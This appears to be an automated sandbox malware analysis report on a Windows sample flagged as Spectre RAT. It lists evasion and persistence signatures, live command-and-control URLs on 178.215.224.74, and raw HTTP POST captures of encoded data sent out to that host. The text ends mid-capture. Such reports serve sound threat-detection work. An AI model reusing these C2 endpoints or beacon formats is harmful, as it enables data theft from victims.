Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561834
MD5: c938c02a19091a3acd044001631692c8
SHA1: 681e661b16ae2bebce2ef18facb86de6fd727cae
SHA256: e090769b89bee3e8ab4a316355fab8da61f629b0eee9da37c0ac312bdc20aad8
Tags: exeuser-Bitsight
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sigma detected: Copy itself to suspicious location via type command
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Drops PE files with a suspicious file extension
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes many files with high entropy
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Recon Command Output Piped To Findstr.EXE
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Too many similar processes found
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://178.215.224.74/v10/ukyh.php?jspo=3002&melq=d460800e784d2ac37a5620f6b348df6f*6&jwvs=4CA966315CCC70F4BEF0FE322EDE46 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh. Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=5 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?gi Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=7 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=8 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=3002&melq=79019141f392e1d4f8c60697fd9f5a0e*2&jwvs=4CA966315CCC70F4BEF0FE322EDE46 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=6h Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=6 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=2021&jwvs=4CA966315CCC70F4BEF0FE322EDE46 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.NNAME=ConsoleSh Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=2016&jwvs=4CA966315CCC70F4BEF0FE322EDE46&bsxa=1 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=60% Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=6T Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=6Q Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=10&melq=1 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=31 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true Avira URL Cloud: Label: malware
Source: http://178.215.224.252/v10/ukyh Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=7wk0 Avira URL Cloud: Label: malware
Source: http://178.215.224.252/v10/ukyh.php?jspo=6 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?uvyw=2 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=33&jwvs=4CA966315CCC70F4BEF0FE322EDE46 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.% Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?uvyw=6 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=6c Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=2022&jwvs=4CA966315CCC70F4BEF0FE322EDE46 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldml Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.c Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=3&jwvs=4CA966315CCC70F4BEF0FE322EDE46&vprl=2 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.# Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe ReversingLabs: Detection: 62%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\nircmdc.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C.pdb source: azvw.exe, 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmp, nircmdc.exe.52.dr
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406301 FindFirstFileW,FindClose, 0_2_00406301
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406CC7
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_0041C29C FindFirstFileA,GetDriveTypeA,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose, 52_2_0041C29C
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_004107A0 FindFirstFileA, 52_2_004107A0
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_2_004062D5 FindFirstFileW,FindClose, 88_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_2_00402E18 FindFirstFileW, 88_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 88_2_00406C9B
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\768032 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\768032\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2853767 - Severity 1 - ETPRO MALWARE Win32/Spectre RAT CnC Activity M1 : 192.168.2.5:49864 -> 178.215.224.74:80
Source: Network traffic Suricata IDS: 2853768 - Severity 1 - ETPRO MALWARE Win32/SpectreRAT CnC Activity M2 : 192.168.2.5:49864 -> 178.215.224.74:80
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 178.215.224.252 178.215.224.252
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: LVLT-10753US LVLT-10753US
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 639Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 77 4b 44 6b 79 4d 6a 45 38 4b 45 45 79 58 46 64 78 5a 33 42 78 58 6d 46 75 62 6d 64 73 63 56 78 44 63 48 42 45 59 58 52 68 58 6c 70 74 59 57 31 70 62 47 56 63 52 47 31 73 63 47 68 72 62 6b 78 31 62 33 4a 7a 58 44 41 35 4d 44 49 79 52 54 41 79 4c 7a 42 44 4d 44 49 6c 4e 6a 55 78 4f 79 38 30 4f 30 49 37 57 55 4a 66 4d 7a 49 77 4b 44 6b 34 4d 6a 73 7a 4b 48 64 70 62 6d 52 76 64 33 45 6f 5a 6d 56 6d 5a 57 78 6d 5a 58 4a 5a 51 46 30 78 4d 6a 41 69 4d 54 49 79 4d 54 41 6f 4d 54 55 36 4c 44 49 7a 4e 79 77 79 4d 6a 51 73 4f 6a 63 79 57 30 68 66 4d 7a 67 77 4b 44 4d 79 4d 6a 4d 77 4b 6a 4d 25 32 46 4d 43 77 77 4d 54 63 75 4d 6a 49 30 4c 6a 63 32 55 30 4a 64 4d 54 41 79 4b 44 45 77 4d 6a 45 78 4b 6a 4d 33 4d 43 34 77 4d 7a 55 75 4d 44 49 32 4c 44 55 30 57 55 4a 66 4d 69 6f 79 4d 6a 30 6f 51 7a 70 55 56 33 46 74 63 6e 46 65 59 32 35 6b 62 57 35 78 56 45 6c 79 63 6b 52 6a 64 47 46 63 55 6d 39 68 62 32 46 73 5a 31 78 45 62 57 35 77 61 47 74 75 52 48 56 76 63 48 74 63 59 33 68 32 64 79 78 6c 65 6d 64 5a 51 46 38 7a 4d 6a 41 71 4d 54 49 34 4d 7a 45 71 4f 54 55 36 4a 6a 49 7a 4e 79 77 77 4d 44 59 75 4e 54 78 54 51 6c 38 79 4b 44 49 77 4e 53 70 44 4f 6c 35 64 63 57 56 79 63 31 35 6a 62 47 5a 74 62 6e 4e 63 51 33 42 34 52 47 4e 32 59 56 78 51 62 32 4e 76 61 32 35 6c 58 6b 5a 76 62 48 42 71 59 57 78 45 64 57 56 79 63 56 52 34 61 6e 56 7a 4c 48 68 72 63 46 6c 49 56 54 4d 79 4d 43 67 78 4d 44 45 79 4d 79 70 42 4d 6c 35 56 63 32 56 77 63 56 78 68 62 6d 5a 76 62 6e 46 63 53 58 42 79 52 6d 46 30 59 31 78 51 62 57 4e 74 61 32 78 6c 58 45 52 76 62 6e 68 71 61 57 35 4d 64 32 39 34 63 31 35 36 61 6e 56 7a 4c 48 70 72 65 46 4e 43 58 7a 45 79 4d 43 6f 78 4d 44 41 78 4d 79 49 7a 4e 7a 67 75 4d 44 4d 31 4c 6a 41 79 4e 43 34 31 4e 46 4e 41 58 77 25 33 44 25 33 44 Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAwKDkyMjE8KEEyXFdxZ3BxXmFubmdscVxDcHBEYXRhXlptYW1pbGVcRG1scGhrbkx1b3JzXDA5MDIyRTAyLzBDMDIlNjUxOy80O0I7WUJfMzIwKDk4MjszKHdpbmRvd3EoZmVmZWxmZXJZQF0xMjAiMTIyMTAoMTU6LDIzNywyMjQsOjcyW0hfMzgwKDMyMjMwKjM%2FMCwwMTcuMjI0Ljc2U0JdMTAyKDEwMjExKjM3MC4wMzUuMDI2LDU0WUJfMioyMj0oQzpUV3FtcnFeY25kbW5xVElyckRjdGFcUm9hb2FsZ1xEbW5waGtuRHVvcHtcY3h2dyxlemdZQF8zMjAqMTI4MzEqOTU6JjIzNywwMDYuNTxTQl8yKDIwNSpDOl5dcWVyc15jbGZtbnNcQ3B4RGN2YVxQb2Nva25lXkZvbHBqYWxEdWVycVR4anVzLHhrcFlIVTMyMCgxMDEyMypBMl5Vc2VwcVxhbmZvbnFcSXByRmF0Y1xQbWNta2xlXERvbnhqaW5Md294c156anVzLHpreFNCXzEyMCoxMDAxMyIzNzguMDM1LjAyNC41NFNAXw%3D%3D
Source: global traffic HTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 247Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 34 33 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 74 4d 44 35 5a 51 46 31 4c 52 6c 6c 49 58 54 6f 73 4e 6a 51 73 4d 7a 49 78 4a 6a 38 33 57 55 42 66 4d 54 41 75 4d 44 45 33 4d 6a 67 79 57 30 42 64 51 54 68 63 56 58 46 6c 63 6e 4e 65 59 57 52 6d 62 57 78 7a 58 45 4e 77 63 6b 5a 6a 64 47 4e 65 54 6d 39 6a 59 57 35 55 56 6d 56 74 65 46 34 31 50 6a 67 79 4d 54 42 65 52 47 74 75 61 33 74 67 4c 47 46 76 62 31 74 41 58 55 4d 36 58 46 64 37 5a 33 4a 7a 58 47 4e 75 5a 6d 39 73 63 31 78 42 63 6e 42 4d 59 58 5a 6a 58 45 78 74 59 32 4e 75 58 6c 52 6e 62 33 4a 63 4e 7a 59 36 4f 44 45 79 58 45 35 72 62 47 46 7a 61 69 78 68 62 57 38 25 33 44 Data Ascii: jspo=43&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAtMD5ZQF1LRllIXTosNjQsMzIxJj83WUBfMTAuMDE3MjgyW0BdQThcVXFlcnNeYWRmbWxzXENwckZjdGNeTm9jYW5UVmVteF41PjgyMTBeRGtua3tgLGFvb1tAXUM6XFd7Z3JzXGNuZm9sc1xBcnBMYXZjXExtY2NuXlRnb3JcNzY6ODEyXE5rbGFzaixhbW8%3D
Source: global traffic HTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 521Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 77 4b 44 30 6f 57 30 42 56 4d 7a 49 34 4b 6a 4d 79 4d 6a 4d 7a 4b 44 45 31 4d 43 59 77 4d 7a 55 73 4d 6a 49 30 4c 6a 63 30 57 55 68 66 4d 54 41 7a 4b 44 4d 77 4d 6a 49 31 4b 6c 4a 6e 64 6d 31 75 64 32 64 45 5a 58 52 70 59 57 64 78 4c 6d 64 36 5a 31 74 41 58 54 4d 34 4d 69 6f 78 4f 44 49 7a 4f 53 6f 7a 4e 54 6f 73 4d 44 4d 31 4c 44 6f 36 4e 69 77 33 4e 6c 74 41 58 54 49 71 4d 6a 49 39 4b 45 4d 36 58 46 64 78 5a 58 4a 78 58 47 46 73 5a 47 39 6d 63 31 35 44 63 48 42 47 59 58 5a 6a 58 6b 78 74 59 57 4e 73 58 48 52 6e 5a 58 4a 63 55 6d 31 30 5a 32 5a 31 5a 30 5a 6e 64 47 74 68 5a 58 45 6d 62 58 70 6e 57 30 4a 64 4f 43 6f 78 4d 44 4d 6f 53 7a 68 63 56 58 4e 6e 63 48 4e 63 59 32 78 6d 62 32 78 7a 56 45 46 79 63 6b 52 68 64 6d 46 65 54 6d 31 6a 59 32 35 65 64 47 56 74 63 6c 52 51 5a 58 5a 74 62 48 64 74 52 47 64 30 61 32 46 6e 63 53 35 6e 63 47 31 5a 51 6c 30 7a 4d 44 41 71 4e 69 70 62 51 6c 55 7a 4d 44 41 71 4d 7a 49 77 4d 54 4d 71 4d 54 63 36 4c 6a 6f 78 4e 79 77 79 4d 6a 59 75 4e 54 5a 5a 51 46 38 7a 4d 6a 41 71 4d 54 49 34 4d 7a 4d 71 4f 54 64 5a 53 46 30 7a 4d 6a 49 6f 4d 7a 49 77 4d 7a 6b 69 4d 7a 55 34 4c 44 49 78 4e 53 34 79 4d 6a 59 6d 4e 54 52 62 51 46 38 7a 4d 44 4d 6f 4d 54 41 79 4d 6a 49 69 55 6d 64 30 5a 57 35 33 5a 55 5a 6e 64 47 6c 68 5a 33 45 75 5a 58 68 6e 55 30 4a 64 4d 54 67 79 4b 44 6b 77 4d 6a 4d 7a 4b 44 4d 31 4f 43 77 36 4f 54 63 73 4d 6a 41 30 4c 6a 63 30 57 30 42 66 Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAwKD0oW0BVMzI4KjMyMjMzKDE1MCYwMzUsMjI0Ljc0WUhfMTAzKDMwMjI1KlJndm1ud2dEZXRpYWdxLmd6Z1tAXTM4MioxODIzOSozNTosMDM1LDo6Niw3NltAXTIqMjI9KEM6XFdxZXJxXGFsZG9mc15DcHBGYXZjXkxtYWNsXHRnZXJcUm10Z2Z1Z0ZndGthZXEmbXpnW0JdOCoxMDMoSzhcVXNncHNcY2xmb2xzVEFyckRhdmFeTm1jY25edGVtclRQZXZtbHdtRGd0a2FncS5ncG1ZQl0zMDAqNipbQlUzMDAqMzIwMTMqMTc6LjoxNywyMjYuNTZZQF8zMjAqMTI4MzMqOTdZSF0zMjIoMzIwMzkiMzU4LDIxNS4yMjYmNTRbQF8zMDMoMTAyMjIiUmd0ZW53ZUZndGlhZ3EuZXhnU0JdMTgyKDkwMjMzKDM1OCw6OTcsMjA0Ljc0W0Bf
Source: global traffic HTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 434Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 39 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 59 57 78 6d 62 57 5a 78 57 30 42 56 54 56 45 6f 54 6d 4e 76 5a 7a 67 69 49 69 41 69 4b 43 67 69 49 69 41 69 49 43 41 67 49 43 41 67 49 69 67 69 54 57 6c 6a 63 47 31 7a 62 32 52 30 49 46 64 72 62 6d 78 76 64 58 45 67 4d 54 49 67 55 6e 42 74 57 30 4a 66 4d 7a 41 75 4d 44 4d 25 32 46 4d 6a 41 77 55 30 4a 66 4f 44 59 30 4e 44 63 30 57 55 4a 64 51 54 4a 55 56 33 46 6c 63 48 4e 63 59 57 78 6d 62 32 78 37 58 6b 46 77 63 45 5a 6a 64 47 46 65 54 47 39 6a 59 32 78 55 56 47 64 76 63 46 77 31 4e 6a 6f 79 4d 54 4a 65 52 47 74 75 61 58 4e 71 4a 6d 46 76 62 56 4e 43 58 30 73 36 58 6c 64 78 5a 33 42 78 58 47 4e 6b 62 6d 31 73 63 31 35 42 63 48 42 45 59 58 52 6a 56 45 35 76 59 32 46 75 58 6c 52 6c 62 33 42 63 4e 7a 51 34 4f 44 4d 77 58 6b 5a 70 62 47 6c 78 61 69 78 6a 62 57 39 5a 51 46 30 78 4d 69 55 77 4e 6c 74 49 58 30 46 4d 57 30 4a 66 64 6e 42 33 5a 31 74 43 56 57 35 6a 62 6e 4e 6e 57 30 42 64 4f 43 34 30 4e 43 59 7a 4d 6a 4d 75 4e 54 64 62 51 46 39 62 51 46 31 42 4f 6c 52 56 63 57 64 79 63 31 35 68 62 6d 52 74 62 6e 46 65 51 33 42 77 52 47 4e 38 59 31 78 53 5a 32 4e 76 59 57 35 6c 58 6b 5a 74 62 6e 4a 6f 61 32 5a 4d 64 32 39 77 63 51 25 33 44 25 33 44 Data Ascii: jspo=9&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=YWxmbWZxW0BVTVEoTmNvZzgiIiAiKCgiIiAiICAgICAgIigiTWljcG1zb2R0IFdrbmxvdXEgMTIgUnBtW0JfMzAuMDM%2FMjAwU0JfODY0NDc0WUJdQTJUV3FlcHNcYWxmb2x7XkFwcEZjdGFeTG9jY2xUVGdvcFw1NjoyMTJeRGtuaXNqJmFvbVNCX0s6XldxZ3BxXGNkbm1sc15BcHBEYXRjVE5vY2FuXlRlb3BcNzQ4ODMwXkZpbGlxaixjbW9ZQF0xMiUwNltIX0FMW0JfdnB3Z1tCVW5jbnNnW0BdOC40NCYzMjMuNTdbQF9bQF1BOlRVcWdyc15hbmRtbnFeQ3BwRGN8Y1xSZ2NvYW5lXkZtbnJoa2ZMd29wcQ%3D%3D
Source: global traffic HTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 331Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 77 4b 44 6b 79 4d 44 45 34 4b 44 4d 25 32 46 4f 43 77 77 4d 7a 63 73 4d 44 49 32 4a 6a 6f 33 4d 46 74 43 58 54 45 77 4d 43 6f 78 4d 6a 67 7a 4d 69 6f 78 4e 54 6f 75 4d 6a 4d 31 4c 6a 49 77 4e 43 59 33 4e 6c 6c 41 58 54 4d 77 4d 69 67 7a 4d 44 49 7a 4d 79 6f 78 4e 7a 6f 6d 4d 44 45 31 4a 6a 41 77 50 43 34 31 4e 6c 6c 43 58 7a 41 71 4d 44 67 39 4b 45 45 36 58 6c 56 7a 5a 58 4a 7a 58 47 4e 6b 5a 47 39 75 63 31 35 44 63 48 42 47 59 58 52 68 58 6c 4a 6e 59 57 39 72 62 6d 64 65 52 47 31 75 63 6d 68 72 62 45 5a 31 62 58 42 78 56 48 4e 35 64 58 67 73 65 47 46 77 57 55 4a 66 4d 7a 49 79 4b 6a 4d 34 4f 54 41 78 4b 6b 45 36 58 46 56 7a 5a 58 4a 78 56 47 4e 73 5a 6d 39 73 63 56 78 42 63 6e 42 45 59 58 5a 68 56 46 4a 74 59 32 31 70 62 47 64 65 52 6d 31 73 63 6d 70 72 62 6b 52 31 62 33 68 78 58 48 46 78 64 33 49 6d 65 6d 74 79 57 55 4a 66 Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAwKDkyMDE4KDM%2FOCwwMzcsMDI2Jjo3MFtCXTEwMCoxMjgzMioxNTouMjM1LjIwNCY3NllAXTMwMigzMDIzMyoxNzomMDE1JjAwPC41NllCXzAqMDg9KEE6XlVzZXJzXGNkZG9uc15DcHBGYXRhXlJnYW9rbmdeRG1ucmhrbEZ1bXBxVHN5dXgseGFwWUJfMzIyKjM4OTAxKkE6XFVzZXJxVGNsZm9scVxBcnBEYXZhVFJtY21pbGdeRm1scmprbkR1b3hxXHFxd3ImemtyWUJf
Source: global traffic HTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 833Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 1701Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 131Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 49 33 4b 44 6b 7a 4d 43 70 4c 4f 46 35 64 63 32 64 77 63 56 35 6a 62 6d 5a 74 5a 6e 74 65 51 33 42 79 52 47 46 30 59 56 78 53 62 57 6c 76 61 57 35 6e 58 6b 39 76 65 6d 74 73 62 47 46 65 52 6d 46 79 5a 32 52 76 65 46 35 62 51 6c 38 25 33 44 Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTI3KDkzMCpLOF5dc2dwcV5jbmZtZnteQ3ByRGF0YVxSbWlvaW5nXk9vemtsbGFeRmFyZ2RveF5bQl8%3D
Source: global traffic HTTP traffic detected: POST /v10/ukyh.php?uvyw=6 HTTP/1.1Content-Type: multipart/form-data; boundary=----974767299852498929531610575User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 29950Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /v10/ukyh.php?uvyw=2 HTTP/1.1Content-Type: multipart/form-data; boundary=----974767299852498929531610575User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 699317Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 367Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 49 33 4b 44 6b 79 4d 69 70 4c 4f 46 35 64 63 32 64 77 63 56 35 6a 62 6d 5a 74 5a 6e 74 65 51 33 42 79 52 47 46 30 59 56 78 53 62 57 6c 76 61 57 35 6e 58 6b 5a 76 62 48 4a 6f 61 57 35 47 64 57 56 77 63 56 34 30 51 30 4d 35 4e 44 51 78 4d 54 64 42 51 55 4d 33 4d 45 51 38 51 45 56 47 4f 45 52 48 4f 7a 49 77 52 30 5a 48 4e 6a 52 66 5a 47 34 6d 4e 58 68 62 51 6c 30 78 4d 44 41 71 4d 54 49 34 4d 7a 45 71 4d 54 55 36 4c 6a 49 7a 4e 53 34 79 4d 44 51 6d 4e 7a 5a 5a 51 46 30 7a 4d 6a 41 6f 4d 7a 41 77 4b 45 45 36 58 46 56 78 62 58 42 7a 